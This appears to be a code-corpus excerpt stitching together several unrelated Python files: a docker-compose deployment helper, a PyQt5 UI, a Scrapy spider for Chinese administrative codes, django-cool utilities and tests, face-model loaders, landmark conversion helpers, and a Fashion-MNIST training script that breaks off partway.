return "./{}_planner/{}-planner-prod/{}-planner-prod-debug".format(args.planner, args.planner, args.planner)
else:
return "./{}_planner/{}-planner-dev".format(args.planner, args.planner)
def runContainers(args, workingDir):
if args.prod_release:
print("Deploying {}_planner in RELEASE mode".format(args.planner))
elif args.prod_debug:
print("Deploying {}_planner in DEBUG mode".format(args.planner))
else:
print("Running simulation for planner {}".format(args.planner))
subprocess.call("{}/run.sh".format(workingDir), shell=True)
def stopContainers(workingDir):
subprocess.call("docker-compose -f {}/docker-compose.yml down".format(workingDir), shell=True)
def buildContainers(args, workingDir):
subprocess.call("docker-compose -f ./components/components.yml build mavros", shell=True)
subprocess.call("docker-compose -f {}/docker-compose.yml build".format(workingDir), shell=True)
if not args.prod_release and not args.prod_debug:
subprocess.call("docker-compose -f ./components/components.yml build sitl-avoidance-server", shell=True)
def rebuildContainers(args, workingDir):
subprocess.call("docker-compose -f ./components/components.yml build --no-cache mavros", shell=True)
subprocess.call("docker-compose -f {}/docker-compose.yml build --no-cache".format(workingDir), shell=True)
if not args.prod_release and not args.prod_debug:
subprocess.call("docker-compose -f ./components/components.yml build --no-cache sitl-avoidance-server", shell=True)
if __name__ == '__main__':
args = createArgsParser()
main(args)
``` |
{
"source": "003userye/003-",
"score": 2
} |
#### File: Python_source/心语/Ui_心语UI.py
```python
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Form(object):
def setupUi(self, Form):
Form.setObjectName("Form")
Form.resize(1000, 618)
Form.setMinimumSize(QtCore.QSize(1000, 618))
Form.setMaximumSize(QtCore.QSize(1000, 618))
font = QtGui.QFont()
font.setFamily("华文细黑")
font.setBold(False)
font.setWeight(50)
Form.setFont(font)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("F:/桌面美化/ICO/爱心.png"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
Form.setWindowIcon(icon)
Form.setStyleSheet("background-image:url(D:/A_图/beijing.jpg);")
self.label = QtWidgets.QLabel(Form)
self.label.setGeometry(QtCore.QRect(20, 10, 71, 71))
self.label.setStyleSheet("QLabel\n"
"{\n"
" background:transparent;\n"
"}")
self.label.setText("")
self.label.setPixmap(QtGui.QPixmap("F:/桌面美化/ICO/爱心.png"))
self.label.setObjectName("label")
self.label_2 = QtWidgets.QLabel(Form)
self.label_2.setGeometry(QtCore.QRect(90, 20, 54, 19))
self.label_2.setStyleSheet("QLabel\n"
"{\n"
" font-size : 15pt;\n"
" background:transparent;\n"
"}\n"
"\n"
"\n"
"")
self.label_2.setObjectName("label_2")
self.pushButton = QtWidgets.QPushButton(Form)
self.pushButton.setGeometry(QtCore.QRect(190, 40, 261, 151))
self.pushButton.setStyleSheet("QPushButton \n"
"{\n"
" \n"
" background-color:rgb(255,255,255); \n"
" color:rgb(6,168,255); \n"
" border:2px solid rgb(6,168,255); \n"
" font-size:14px; \n"
" border-radius:10px;\n"
"}\n"
"QPushButton:hover\n"
"{\n"
" background-color: rgb(212,243,255); \n"
" color:rgb(6,168,255);\n"
" border:2px solid rgb(6,168,255); \n"
" border-radius:14px;\n"
"}\n"
"QPushButton:pressed\n"
"{\n"
" background-color: rgb(175,232,255); \n"
" color:white; \n"
" border:2px solid rgb(6,168,255); \n"
" border-radius:14px;\n"
"}")
self.pushButton.setText("")
self.pushButton.setObjectName("pushButton")
self.pushButton_2 = QtWidgets.QPushButton(Form)
self.pushButton_2.setGeometry(QtCore.QRect(200, 50, 50, 50))
self.pushButton_2.setStyleSheet("/*按钮静止无操作样式*/\n"
"QPushButton\n"
"{\n"
" background-image:rgb(255,255,255); \n"
" border-radius:25px;\n"
" border:2px solid rgb(6,168,255);\n"
" \n"
" \n"
"}\n"
"\n"
"/*鼠标悬停在按钮*/\n"
"QPushButton:hover\n"
"{\n"
" background-color: rgb(212,243,255);\n"
" color:rgb(6,168,255);\n"
" border:2px solid rgb(6,168,255);\n"
" border-radius:25px;\n"
"}\n"
"\n"
"/*鼠标按下按钮*/\n"
"QPushButton:pressed\n"
"{\n"
" background-color: rgb(175,232,255);\n"
" color:white;\n"
" border:2px solid rgb(6,168,255);\n"
" border-radius:25px;\n"
"}")
self.pushButton_2.setText("")
icon1 = QtGui.QIcon()
icon1.addPixmap(QtGui.QPixmap("F:/桌面美化/ICO/favicon (2).ico"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
self.pushButton_2.setIcon(icon1)
self.pushButton_2.setIconSize(QtCore.QSize(50, 50))
self.pushButton_2.setObjectName("pushButton_2")
self.pushButton_3 = QtWidgets.QPushButton(Form)
self.pushButton_3.setGeometry(QtCore.QRect(250, 50, 75, 23))
font = QtGui.QFont()
font.setFamily("华文隶书")
font.setPointSize(11)
font.setBold(True)
font.setWeight(75)
self.pushButton_3.setFont(font)
self.pushButton_3.setCursor(QtGui.QCursor(QtCore.Qt.PointingHandCursor))
self.pushButton_3.setStyleSheet("/*按钮静止无操作样式*/\n"
"QPushButton \n"
"{\n"
" background:transparent;\n"
"}\n"
"\n"
"/*鼠标悬停在按钮*/\n"
"QPushButton:hover\n"
"{\n"
" background:transparent;\n"
" text-decoration:underline;\n"
"}\n"
"\n"
"/*鼠标按下按钮*/\n"
"QPushButton:pressed\n"
"{\n"
"#测试;\n"
"}")
self.pushButton_3.setObjectName("pushButton_3")
self.label_3 = QtWidgets.QLabel(Form)
self.label_3.setGeometry(QtCore.QRect(260, 80, 161, 16))
font = QtGui.QFont()
font.setFamily("Bahnschrift Condensed")
self.label_3.setFont(font)
self.label_3.setStyleSheet("QLabel\n"
"{\n"
" background:transparent;\n"
"}")
self.label_3.setObjectName("label_3")
self.textBrowser = QtWidgets.QTextBrowser(Form)
self.textBrowser.setGeometry(QtCore.QRect(200, 110, 241, 75))
font = QtGui.QFont()
font.setFamily("华文隶书")
font.setBold(False)
font.setWeight(50)
self.textBrowser.setFont(font)
self.textBrowser.setStyleSheet("")
self.textBrowser.setObjectName("textBrowser")
self.label_4 = QtWidgets.QLabel(Form)
self.label_4.setGeometry(QtCore.QRect(270, 320, 281, 61))
self.label_4.setStyleSheet("QLabel{\n"
"\n"
"border-radius:12px\n"
"\n"
"\n"
"}")
self.label_4.setObjectName("label_4")
self.retranslateUi(Form)
QtCore.QMetaObject.connectSlotsByName(Form)
def retranslateUi(self, Form):
_translate = QtCore.QCoreApplication.translate
Form.setWindowTitle(_translate("Form", "心语"))
self.label_2.setText(_translate("Form", "<html><head/><body><p><span style=\" color:#aaffff;\">〇〇3</span></p></body></html>"))
self.pushButton_3.setText(_translate("Form", "这个年纪"))
self.label_3.setText(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'Bahnschrift Condensed\'; font-size:9pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:12px; margin-bottom:12px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px;\"><span style=\" font-family:\'SimSun\'; font-size:10pt; font-weight:600; color:#00ff7f;\">12-4 23:47:06</span></p></body></html>"))
self.textBrowser.setHtml(_translate("Form", "<!DOCTYPE HTML PUBLIC \"-//W3C//DTD HTML 4.0//EN\" \"http://www.w3.org/TR/REC-html40/strict.dtd\">\n"
"<html><head><meta name=\"qrichtext\" content=\"1\" /><style type=\"text/css\">\n"
"p, li { white-space: pre-wrap; }\n"
"</style></head><body style=\" font-family:\'华文隶书\'; font-size:9pt; font-weight:400; font-style:normal;\">\n"
"<p style=\" margin-top:0px; margin-bottom:15px; margin-left:0px; margin-right:0px; -qt-block-indent:0; text-indent:0px; line-height:24px; background-color:#ffffff;\"><span style=\" font-family:\'arial,宋体,sans-serif\'; font-size:14px; color:#333333; background-color:#ffffff;\">慈母用手中的针线,为远行的儿子赶制身上的衣衫。临行前一针针密密地缝缀,怕的是儿子回来得晚衣服破损。有谁敢说,子女像小草那样微弱的孝心,能够报答得了像春晖普泽的慈母恩情呢?</span></p></body></html>"))
self.label_4.setText(_translate("Form", "TextLabel"))
``` |
{
"source": "007gzs/china_admincode",
"score": 3
} |
#### File: admincode/spiders/stats.py
```python
import scrapy
from admincode.items import AdmincodeItem
class StatsSpider(scrapy.Spider):
name = 'stats'
allowed_domains = ['stats.gov.cn']
start_urls = ['http://www.stats.gov.cn/tjsj/tjbz/tjyqhdmhcxhfdm/2016/index.html']
def parse(self, response):
for ret in self.parse_provincetr(response, response.selector.css(".provincetr")):
yield ret
for ret in self.parse_citytr(response, response.selector.css(".citytr")):
yield ret
for ret in self.parse_countytr(response, response.selector.css(".countytr")):
yield ret
for ret in self.parse_towntr(response, response.selector.css(".towntr")):
yield ret
for ret in self.parse_villagetr(response, response.selector.css(".villagetr")):
yield ret
def get_text_href(self, td):
if not td.xpath('a'):
return td.xpath('text()').extract()[0], None
else:
return td.xpath('a/text()').extract()[0], td.xpath('a/@href').extract()[0]
def parse_provincetr(self, response, trs):
for td in trs.xpath('td'):
item = AdmincodeItem()
item['codetype'] = 'province'
item['name'], href = self.get_text_href(td)
if href:
item['code'] = href.split('.')[0] + ('0' * 10)
item['parent_code'] = item.get_parent()
item['url'] = response.urljoin(href)
yield item
if 'url' in item.keys():
yield scrapy.Request(item['url'], callback=self.parse)
def parse_2td(self, response, trs, codetype):
for tr in trs:
item = AdmincodeItem()
item['codetype'] = codetype
item['code'], href = self.get_text_href(tr.xpath('td')[0])
item['parent_code'] = item.get_parent()
if href:
item['url'] = response.urljoin(href)
item['name'], href = self.get_text_href(tr.xpath('td')[1])
if href:
item['url'] = response.urljoin(href)
yield item
if 'url' in item.keys():
yield scrapy.Request(item['url'], callback=self.parse)
def parse_citytr(self, response, trs):
return self.parse_2td(response, trs, 'city')
def parse_countytr(self, response, trs):
return self.parse_2td(response, trs, 'county')
def parse_towntr(self, response, trs):
return self.parse_2td(response, trs, 'town')
def parse_villagetr(self, response, trs):
for tr in trs:
item = AdmincodeItem()
item['codetype'] = 'village'
item['code'], href = self.get_text_href(tr.xpath('td')[0])
item['parent_code'] = item.get_parent()
if href:
item['url'] = response.urljoin(href)
item['towntypecode'], href = self.get_text_href(tr.xpath('td')[1])
if href:
item['url'] = response.urljoin(href)
item['name'], href = self.get_text_href(tr.xpath('td')[2])
if href:
item['url'] = response.urljoin(href)
yield item
if 'url' in item.keys():
yield scrapy.Request(item['url'], callback=self.parse)
``` |
{
"source": "007gzs/django-cool",
"score": 2
} |
#### File: cool/core/utils.py
```python
import operator
from functools import reduce
from django.core.exceptions import FieldDoesNotExist
from django.db.models import Q
from django.db.models.constants import LOOKUP_SEP
def split_camel_name(name, fall=False):
"""
驼峰命名分割为单词
GenerateURLs => [Generate, URLs]
generateURLsLite => [generate, URLs, Lite]
"""
if not name:
return []
    latest_upper = name[0].isupper()
    idx_list = []
    for idx, char in enumerate(name):
        upper = char.isupper()
        # rising
        if upper and not latest_upper:
            idx_list.append(idx)
        # falling
        elif fall and not upper and latest_upper:
            idx_list.append(idx-1)
        latest_upper = upper
l_idx = 0
name_items = []
for r_idx in idx_list:
if name[l_idx:r_idx]:
name_items.append(name[l_idx:r_idx])
l_idx = r_idx
if name[l_idx:]:
name_items.append(name[l_idx:])
return name_items
def construct_search(queryset, field_name):
"""
生成搜索关键字
"""
if field_name.startswith('^'):
return "%s__istartswith" % field_name[1:]
elif field_name.startswith('='):
return "%s__iexact" % field_name[1:]
# Use field_name if it includes a lookup.
opts = queryset.model._meta
lookup_fields = field_name.split(LOOKUP_SEP)
# Go through the fields, following all relations.
prev_field = None
for path_part in lookup_fields:
if path_part == 'pk':
path_part = opts.pk.name
try:
field = opts.get_field(path_part)
except FieldDoesNotExist:
# Use valid query lookups.
if prev_field and prev_field.get_lookup(path_part):
return field_name
else:
prev_field = field
if hasattr(field, 'get_path_info'):
# Update opts to follow the relation.
opts = field.get_path_info()[-1].to_opts
# Otherwise, use the field with icontains.
return "%s__icontains" % field_name
def get_search_results(queryset, search_term, search_fields, model):
"""
Return a tuple containing a queryset to implement the search
and a boolean indicating if the results may contain duplicates.
"""
try:
from django.contrib.admin.utils import (
lookup_needs_distinct as lookup_spawns_duplicates,
)
except ImportError:
from django.contrib.admin.utils import lookup_spawns_duplicates
use_distinct = False
if search_fields and search_term:
orm_lookups = [construct_search(queryset, str(search_field)) for search_field in search_fields]
for bit in search_term.split():
or_queries = [Q(**{orm_lookup: bit}) for orm_lookup in orm_lookups]
queryset = queryset.filter(reduce(operator.or_, or_queries))
use_distinct |= any(lookup_spawns_duplicates(model._meta, search_spec) for search_spec in orm_lookups)
return queryset, use_distinct
```
#### File: tests/model/test_models.py
```python
from django.test import TestCase
from tests.model import models
class ModelTests(TestCase):
def setUp(self):
models.TestModel.objects.all().delete()
models.SubModel.objects.all().delete()
models.SubModel.objects.create(id=1, unique_field="sub1_unique_field")
models.SubModel.objects.create(id=2, unique_field="sub2_unique_field")
models.SubModel.objects.create(id=3, unique_field="sub3_unique_field")
models.TestModel.objects.create(
id=1,
unique_field="obj1_unique_field",
unique_field2_id=1,
unique_field3_id='sub2_unique_field',
unique_together1_field1="obj1_unique_together1_field1",
unique_together1_field2="obj1_unique_together1_field2",
unique_together2_field1="obj1_unique_together2_field1",
unique_together2_field2="obj1_unique_together2_field2",
unique_together2_field3="obj1_unique_together2_field3",
unique_together3_field1="obj1_unique_together3_field1",
unique_together3_field2=132,
unique_together4_field1_id=2,
unique_together4_field2_id='sub3_unique_field'
)
models.TestModel.objects.create(
id=2,
unique_field="obj2_unique_field",
unique_field2_id=3,
unique_field3_id='sub1_unique_field',
unique_together1_field1="obj2_unique_together1_field1",
unique_together1_field2="obj2_unique_together1_field2",
unique_together2_field1="obj2_unique_together2_field1",
unique_together2_field2="obj2_unique_together2_field2",
unique_together2_field3="obj2_unique_together2_field3",
unique_together3_field1="obj2_unique_together3_field1",
unique_together3_field2=232,
unique_together4_field1_id=1,
unique_together4_field2_id='sub2_unique_field'
)
def test_pk(self):
obj = models.TestModel.get_obj_by_pk_from_cache(1)
self.assertIsInstance(obj, models.TestModel)
self.assertEqual(obj.pk, 1)
self.assertEqual(obj.unique_field, 'obj1_unique_field')
def test_pks(self):
dict_keys_list = list()
objs = models.TestModel.get_objs_by_pks_from_cache([2, 1], _dict_keys_list=dict_keys_list)
self.assertIsInstance(objs, dict)
self.assertEqual(len(dict_keys_list), 2)
self.assertEqual(len(objs), 2)
self.assertEqual(objs[dict_keys_list[0]].pk, 2)
self.assertEqual(objs[dict_keys_list[0]].unique_field, 'obj2_unique_field')
self.assertEqual(objs[dict_keys_list[1]].pk, 1)
self.assertEqual(objs[dict_keys_list[1]].unique_field, 'obj1_unique_field')
def test_unique_key(self):
obj = models.TestModel.get_obj_by_unique_key_from_cache(unique_field='obj1_unique_field')
self.assertIsInstance(obj, models.TestModel)
self.assertEqual(obj.pk, 1)
self.assertEqual(obj.unique_field, 'obj1_unique_field')
def test_unique_keys(self):
dict_keys_list = list()
objs = models.TestModel.get_objs_by_unique_keys_from_cache(
unique_field=['obj1_unique_field', 'obj2_unique_field'], _dict_keys_list=dict_keys_list
)
self.assertEqual(len(dict_keys_list), 2)
self.assertIsInstance(objs, dict)
self.assertEqual(len(objs), 2)
self.assertEqual(objs[dict_keys_list[0]].pk, 1)
self.assertEqual(objs[dict_keys_list[0]].unique_field, 'obj1_unique_field')
self.assertEqual(objs[dict_keys_list[1]].pk, 2)
self.assertEqual(objs[dict_keys_list[1]].unique_field, 'obj2_unique_field')
def test_foreign_unique_key(self):
obj = models.TestModel.get_obj_by_unique_key_from_cache(unique_field2='1')
self.assertIsInstance(obj, models.TestModel)
self.assertEqual(obj.pk, 1)
obj = models.TestModel.get_obj_by_unique_key_from_cache(unique_field2_id=1)
self.assertIsInstance(obj, models.TestModel)
self.assertEqual(obj.pk, 1)
obj = models.TestModel.get_obj_by_unique_key_from_cache(unique_field2=models.SubModel.objects.get(pk=1))
self.assertIsInstance(obj, models.TestModel)
self.assertEqual(obj.pk, 1)
obj = models.TestModel.get_obj_by_unique_key_from_cache(unique_field3=models.SubModel.objects.get(pk=1))
self.assertIsInstance(obj, models.TestModel)
self.assertEqual(obj.pk, 2)
def test_foreign_unique_keys(self):
dict_keys_list = list()
objs = models.TestModel.get_objs_by_unique_keys_from_cache(
unique_field2=['1', 3], _dict_keys_list=dict_keys_list
)
self.assertIsInstance(objs, dict)
self.assertEqual(objs[dict_keys_list[0]].pk, 1)
self.assertEqual(objs[dict_keys_list[1]].pk, 2)
def test_unique_together(self):
obj1 = models.TestModel.get_obj_by_unique_together_key_from_cache(
unique_together1_field1="obj1_unique_together1_field1",
unique_together1_field2="obj1_unique_together1_field2",
)
self.assertIsInstance(obj1, models.TestModel)
self.assertEqual(obj1.pk, 1)
self.assertEqual(obj1.unique_field, 'obj1_unique_field')
obj2 = models.TestModel.get_obj_by_unique_together_key_from_cache(
unique_together2_field1="obj2_unique_together2_field1",
unique_together2_field2="obj2_unique_together2_field2",
unique_together2_field3="obj2_unique_together2_field3"
)
self.assertIsInstance(obj2, models.TestModel)
self.assertEqual(obj2.pk, 2)
self.assertEqual(obj2.unique_field, 'obj2_unique_field')
obj = models.TestModel.get_obj_by_unique_together_key_from_cache(
unique_together3_field1="obj1_unique_together3_field1",
unique_together3_field2=132
)
self.assertIsInstance(obj, models.TestModel)
self.assertEqual(obj.pk, 1)
self.assertEqual(obj.unique_field, 'obj1_unique_field')
obj = models.TestModel.get_obj_by_unique_together_key_from_cache(
unique_together4_field1=models.SubModel.objects.get(pk=1),
unique_together4_field2=models.SubModel.objects.get(pk=2)
)
self.assertIsInstance(obj, models.TestModel)
self.assertEqual(obj.pk, 2)
self.assertEqual(obj.unique_field, 'obj2_unique_field')
obj = models.TestModel.get_obj_by_unique_together_key_from_cache(
unique_together4_field1=2,
unique_together4_field2='sub3_unique_field'
)
self.assertIsInstance(obj, models.TestModel)
self.assertEqual(obj.pk, 1)
self.assertEqual(obj.unique_field, 'obj1_unique_field')
def test_unique_togethers(self):
dict_keys_list = list()
def _check(_objs, _dict_keys_list):
self.assertIsInstance(_objs, dict)
self.assertEqual(len(_dict_keys_list), 2)
self.assertEqual(_objs[_dict_keys_list[0]].pk, 1)
self.assertEqual(_objs[_dict_keys_list[0]].unique_field, 'obj1_unique_field')
self.assertEqual(_objs[_dict_keys_list[1]].pk, 2)
self.assertEqual(_objs[_dict_keys_list[1]].unique_field, 'obj2_unique_field')
objs = models.TestModel.get_objs_by_unique_together_key_from_cache(
unique_together1_field1=('obj1_unique_together1_field1', 'obj2_unique_together1_field1'),
unique_together1_field2=('obj1_unique_together1_field2', 'obj2_unique_together1_field2'),
_dict_keys_list=dict_keys_list
)
_check(objs, dict_keys_list)
objs = models.TestModel.get_objs_by_unique_together_key_from_cache(
unique_together2_field1=('obj1_unique_together2_field1', 'obj2_unique_together2_field1'),
unique_together2_field2=('obj1_unique_together2_field2', 'obj2_unique_together2_field2'),
unique_together2_field3=('obj1_unique_together2_field3', 'obj2_unique_together2_field3'),
_dict_keys_list=dict_keys_list
)
_check(objs, dict_keys_list)
objs = models.TestModel.get_objs_by_unique_together_key_from_cache(
unique_together3_field1=('obj1_unique_together3_field1', 'obj2_unique_together3_field1'),
unique_together3_field2=(132, 232),
_dict_keys_list=dict_keys_list
)
_check(objs, dict_keys_list)
objs = models.TestModel.get_objs_by_unique_together_key_from_cache(
unique_together4_field1=(models.SubModel.objects.get(pk=2), models.SubModel.objects.get(pk=1)),
unique_together4_field2=(models.SubModel.objects.get(pk=3), models.SubModel.objects.get(pk=2)),
_dict_keys_list=dict_keys_list
)
_check(objs, dict_keys_list)
objs = models.TestModel.get_objs_by_unique_together_key_from_cache(
unique_together4_field1_id=(2, models.SubModel.objects.get(pk=1)),
unique_together4_field2_id=('sub3_unique_field', models.SubModel.objects.get(pk=2)),
_dict_keys_list=dict_keys_list
)
_check(objs, dict_keys_list)
def test_get_objs_from_cache(self):
dict_keys_list = list()
def _check(_objs, _dict_keys_list):
self.assertIsInstance(_objs, dict)
self.assertEqual(len(_dict_keys_list), 2)
self.assertEqual(_objs[_dict_keys_list[0]].pk, 1)
self.assertEqual(_objs[_dict_keys_list[0]].unique_field, 'obj1_unique_field')
self.assertEqual(_objs[_dict_keys_list[1]].pk, 2)
self.assertEqual(_objs[_dict_keys_list[1]].unique_field, 'obj2_unique_field')
objs = models.TestModel.get_objs_from_cache(
field_names=('unique_together1_field1', 'unique_together1_field2'),
field_values=[
('obj1_unique_together1_field1', 'obj1_unique_together1_field2'),
('obj2_unique_together1_field1', 'obj2_unique_together1_field2'),
],
_dict_keys_list=dict_keys_list
)
_check(objs, dict_keys_list)
objs = models.TestModel.get_objs_from_cache(
field_names=('unique_together2_field1', 'unique_together2_field2', 'unique_together2_field3'),
field_values=[
('obj1_unique_together2_field1', 'obj1_unique_together2_field2', 'obj1_unique_together2_field3'),
('obj2_unique_together2_field1', 'obj2_unique_together2_field2', 'obj2_unique_together2_field3'),
],
_dict_keys_list=dict_keys_list
)
_check(objs, dict_keys_list)
objs = models.TestModel.get_objs_from_cache(
field_names=('unique_together3_field1', 'unique_together3_field2'),
field_values=[
('obj1_unique_together3_field1', 132),
('obj2_unique_together3_field1', 232),
],
_dict_keys_list=dict_keys_list
)
_check(objs, dict_keys_list)
objs = models.TestModel.get_objs_from_cache(
field_names=('unique_together4_field1', 'unique_together4_field2'),
field_values=[
(models.SubModel.objects.get(pk=2), models.SubModel.objects.get(pk=3)),
(models.SubModel.objects.get(pk=1), models.SubModel.objects.get(pk=2)),
],
_dict_keys_list=dict_keys_list
)
_check(objs, dict_keys_list)
objs = models.TestModel.get_objs_from_cache(
field_names=('unique_together4_field1_id', 'unique_together4_field2_id'),
field_values=[
(2, 'sub3_unique_field'),
(models.SubModel.objects.get(pk=1), models.SubModel.objects.get(pk=2)),
],
_dict_keys_list=dict_keys_list
)
_check(objs, dict_keys_list)
def test_flush_cache(self):
from django.core.cache import cache
from django.db import connection
connection.force_debug_cursor = True
real_obj = models.TestModel.objects.get(pk=1)
sub_obj = models.SubModel.objects.get(pk=2)
def _get_from_cache():
models.TestModel.get_obj_by_pk_from_cache(1)
models.TestModel.get_obj_by_unique_key_from_cache(unique_field='obj1_unique_field')
models.TestModel.get_obj_by_unique_key_from_cache(unique_field2_id=1)
models.TestModel.get_obj_by_unique_key_from_cache(unique_field3=sub_obj)
models.TestModel.get_obj_by_unique_together_key_from_cache(
unique_together1_field1="obj1_unique_together1_field1",
unique_together1_field2="obj1_unique_together1_field2",
)
models.TestModel.get_obj_by_unique_together_key_from_cache(
unique_together2_field1="obj1_unique_together2_field1",
unique_together2_field2="obj1_unique_together2_field2",
unique_together2_field3="obj1_unique_together2_field3"
)
models.TestModel.get_obj_by_unique_together_key_from_cache(
unique_together3_field1="obj1_unique_together3_field1",
unique_together3_field2=132
)
cache.clear()
connection.queries_log.clear()
_get_from_cache()
queries1 = connection.queries
self.assertTrue(queries1)
connection.queries_log.clear()
_get_from_cache()
self.assertFalse(connection.queries)
real_obj.flush_cache()
connection.queries_log.clear()
_get_from_cache()
queries2 = connection.queries
def _get_sqls(queries):
return list(map(lambda x: x['sql'], queries))
self.assertEqual(_get_sqls(queries1), _get_sqls(queries2))
``` |
{
"source": "007gzs/oface",
"score": 2
} |
#### File: oface/model/base.py
```python
from __future__ import absolute_import, unicode_literals
import onnxruntime
class ONNXModel:
def __init__(self, model_file=None, session=None, task_name=''):
self.model_file = model_file
self.session = session
self.task_name = task_name
if self.session is None:
assert self.model_file is not None
self.session = onnxruntime.InferenceSession(self.model_file, None)
``` |
{
"source": "007gzs/xface",
"score": 2
} |
#### File: xface/core/utils.py
```python
from __future__ import absolute_import, unicode_literals
# it's an approximate map
# 15 --> (99+103)/2
# 17, 19; 20, 22; 16; 9 will be used in face crop(25 points)
lms25_2_lms106 = {1: 105, 2: 106, 3: 34, 4: 38, 5: 43,
6: 47, 7: 52, 8: 55, 9: 88, 10: 94,
11: 85, 12: 91, 13: 63, 14: 59, 15: 99,
16: 61, 17: 71, 18: 73, 19: 67, 20: 80,
21: 82, 22: 76, 23: 36, 24: 45, 25: 17}
# 1: left eye center
# 2: right eye center
# 3: nose tip
# 4: left mouth corner
# 5: right mouth corner
lms5_2_lms25 = {1: 1, 2: 2, 3: 8, 4: 11, 5: 12}
lms5_2_lms106 = {1: 105, 2: 106, 3: 55, 4: 85, 5: 91}
def lms106_2_lms25(lms_106):
lms25 = []
for cur_point_index in range(25):
cur_point_id = cur_point_index + 1
point_id_106 = lms25_2_lms106[cur_point_id]
cur_point_index_106 = point_id_106 - 1
cur_point_x = lms_106[cur_point_index_106 * 2]
cur_point_y = lms_106[cur_point_index_106 * 2 + 1]
lms25.append(cur_point_x)
lms25.append(cur_point_y)
return lms25
def lms106_2_lms5(lms_106):
lms5 = []
for cur_point_index in range(5):
cur_point_id = cur_point_index + 1
point_id_106 = lms5_2_lms106[cur_point_id]
cur_point_index_106 = point_id_106 - 1
cur_point_x = lms_106[cur_point_index_106 * 2]
cur_point_y = lms_106[cur_point_index_106 * 2 + 1]
lms5.append(cur_point_x)
lms5.append(cur_point_y)
return lms5
def lms25_2_lms5(lms_25):
lms5 = []
for cur_point_index in range(5):
cur_point_id = cur_point_index + 1
point_id_25 = lms5_2_lms25[cur_point_id]
cur_point_index_25 = point_id_25 - 1
cur_point_x = lms_25[cur_point_index_25 * 2]
cur_point_y = lms_25[cur_point_index_25 * 2 + 1]
lms5.append(cur_point_x)
lms5.append(cur_point_y)
return lms5
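# Illustrative only: given a flat 106-point list [x1, y1, x2, y2, ...],
# lms106_2_lms5(lms_106) picks out the eye centers, nose tip and mouth corners,
# so the result has length 10 (five x,y pairs).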
```
#### File: xface/model/base.py
```python
from __future__ import absolute_import, unicode_literals
import json
import os
import sys
import torch
class Config(dict):
def __getattr__(self, key):
if key in self:
return self[key]
return None
def __setattr__(self, key, value):
self[key] = value
class Base:
def __init__(self, model_path, model_category, model_name, meta_file='model_meta.json'):
model_root_dir = os.path.join(model_path, model_category, model_name)
meta_file_path = os.path.join(model_root_dir, meta_file)
with open(meta_file_path, 'r') as f:
self.meta_conf = json.load(f)
model_root = os.path.dirname(model_path)
if model_root not in sys.path:
sys.path.append(model_root)
self.model_path = model_path
self.model_category = model_category
self.model_name = model_name
self.model_file_path = os.path.join(model_root_dir, self.meta_conf['model_file'])
self.model_type = self.meta_conf['model_type']
self.model_info = self.meta_conf['model_info']
self.release_date = self.meta_conf['release_date']
self.input_height = self.meta_conf['input_height']
self.input_width = self.meta_conf['input_width']
self.device = None
self.model = None
def load(self, device=None):
assert self.model is None
if device is None:
if torch.cuda.is_available():
device = "cuda:%d" % torch.cuda.current_device()
else:
device = "cpu"
self.device = torch.device(device)
self.model = torch.load(self.model_file_path, map_location=self.device)
self.model.eval()
``` |
{
"source": "007HarshChaudhary/Deep-Learning",
"score": 2
} |
#### File: 007HarshChaudhary/Deep-Learning/Fashion_MNIST.py
```python
import torch
from torch import optim, nn
import torch.nn.functional as F
from torchvision import datasets, transforms
import helper
import time
import matplotlib.pyplot as plt
import numpy as np
from torch.utils.data.sampler import SubsetRandomSampler
transform = transforms.Compose([transforms.ToTensor()])
trainset = datasets.FashionMNIST('Fashion_MNIST', train=True, download=True, transform=transform)
valid_size = 0.2
num_train = len(trainset)
indices = list(range(num_train))
np.random.shuffle(indices)
split = int(valid_size*num_train)
train_idx, valid_idx = indices[split: ], indices[ :split]
train_sampler = SubsetRandomSampler(train_idx)
valid_sampler = SubsetRandomSampler(valid_idx)
train_loader = torch.utils.data.DataLoader(trainset, batch_size=64, sampler=train_sampler)
valid_loader = torch.utils.data.DataLoader(trainset, batch_size=64, sampler=valid_sampler)
testset = datasets.FashionMNIST('Fashion_MNIST', train=False, download=True, transform=transform)
test_loader = torch.utils.data.DataLoader(testset, batch_size=64, shuffle=True)
class Network(nn.Module):
def __init__(self):
super().__init__()
self.fc1 = nn.Linear(784, 356)
self.batchnorm1 = nn.BatchNorm1d(356)
self.fc2 = nn.Linear(356, 124)
self.batchnorm2 = nn.BatchNorm1d(124)
self.fc3 = nn.Linear(124, 64)
self.batchnorm3 = nn.BatchNorm1d(64)
self.fc4 = nn.Linear(64, 10)
self.dropout = nn.Dropout(0.2)
def forward(self, x):
x = x.view(-1, 784)
x = self.dropout(F.relu(self.batchnorm1(self.fc1(x))))
x = self.dropout(F.relu(self.batchnorm2(self.fc2(x))))
x = self.dropout(F.relu(self.batchnorm3(self.fc3(x))))
x = F.log_softmax(self.fc4(x), dim=1)
return x
model = Network()
model.cuda()
criterion = nn.NLLLoss()
optimizer = optim.Adam(model.parameters(), lr=0.003)
start = time.time()
epochs = 30
train_losses=[]
valid_losses=[]
min_validation_loss = np.Inf
for e in range(epochs):
running_loss = 0
model.train()
for images, labels in train_loader:
images = images.cuda()
labels = labels.cuda()
output = model(images)
loss = criterion(output, labels)
optimizer.zero_grad()
loss.backward()
optimizer.step()
running_loss += loss.item()
valid_loss = 0
validation_accuracy = 0
model.eval()
with torch.no_grad():
for images, labels in valid_loader:
images = images.cuda()
labels = labels.cuda()
output = model(images)
valid_loss += criterion(output, labels)
ps = torch.exp(output)
top_p, top_class = ps.topk(1, dim=1)
equals = top_class==labels.view(*top_class.shape)
validation_accuracy += torch.mean(equals.type(torch.FloatTensor))
valid_loss /= len(valid_loader)
running_loss = running_loss/len(train_loader)
valid_losses.append(valid_loss)
train_losses.append(running_loss)
print("Epoch: {}/{} ".format(e+1, epochs),
"Training Loss: {:.3f} ".format(running_loss),
"Validation Loss: {:.3f} ".format(valid_loss),
